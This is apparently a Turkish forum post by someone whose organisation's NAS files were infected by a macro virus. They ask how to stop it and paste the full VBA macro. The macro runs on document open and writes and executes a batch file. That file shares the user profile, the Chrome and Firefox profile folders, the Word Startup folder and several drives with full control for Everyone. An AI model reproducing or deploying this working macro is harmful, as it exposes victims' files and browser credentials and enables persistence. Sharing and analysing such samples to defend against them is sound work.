Kurumum da NAS server de bulunan içeriklerimize bir tür virüs bulaştı.
İçeriğinde bulunan WORD, EXCEL, POWERPOINT dosyalarının uzantıları .docm, xmlm ve pptm oldu.
Açtığımızda ise içeriği etkinleştir diyerek dosya açılıyor.
Dosya içerisinde kod düzenine baktığım da şöyle bir şeyle karşılaştım.
Private Sub Document_Open()
Dim strUserName As String
'Use the Application Object to get the Username
strUserName = Application.UserName
If strUserName = "Administrator" Then GoTo lineCls
If Not strUserName Then GoTo lineRn
lineRn:
Dim filesize As Integer
Dim FlName As String
FlName = "C:\WINDOWS\RUN_AS.BAT"
'~~> get a free file handle
filesize = FreeFile()
'~~> Open your file
Open FlName For Output As #filesize
'~~> Export Text
Print #filesize, "NET SHARE USRPRFL=%USERPROFILE%"
Print #filesize, "CACLS %USERPROFILE% /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE% /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE CHRM_CCH=%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE FRFX_CCH=%USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE MS_STRTP=%USERPROFILE%\Application Data\Microsoft\Word\Startup"
Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE DSK_D=D:\"
Print #filesize, "CACLS D:\ /E /R EVERYONE"
Print #filesize, "CACLS D:\ /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE DSK_E=E:\"
Print #filesize, "CACLS E:\ /E /R EVERYONE"
Print #filesize, "CACLS E:\ /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE DSK_F=F:\"
Print #filesize, "CACLS F:\ /E /R EVERYONE"
Print #filesize, "CACLS F:\ /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE DSK_G=G:\"
Print #filesize, "CACLS G:\ /E /R EVERYONE"
Print #filesize, "CACLS G:\ /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "> %PUBLIC%\REPORT.TXT ("
Print #filesize, "ECHO WORK SUCCESFULLY "
Print #filesize, "ECHO ---"
Print #filesize, "ECHO %DATE%"
Print #filesize, "ECHO %TIME%"
Print #filesize, "ECHO IPCONFIG"
Print #filesize, "ECHO NET USER %USERNAME%"
Print #filesize, "ECHO %USERPROFILE%"
Print #filesize, "ECHO ---"
Print #filesize, "ECHO BY YORGOS VASILIS"
Print #filesize, ")"
Print #filesize, "EXIT"
Close #filesize
Shell "cmd /c C:\WINDOWS\RUN_AS.BAT"
lineCls:
Dim filesize2 As Integer
Dim FlName2 As String
FlName2 = "C:\REPORT.TXT"
'~~> get a free file handle
filesize2 = FreeFile()
'~~> Open your file
Open FlName2 For Output As #filesize2
'~~> Export Text
Print #filesize2, "The command applied succesfully"
Close #filesize2
End SubBu YORGOS VASILIS kimse iyi sayıyorum şuan 
)Daha önce karşılaşan varmı?
Sizce nasıl engelleriz?
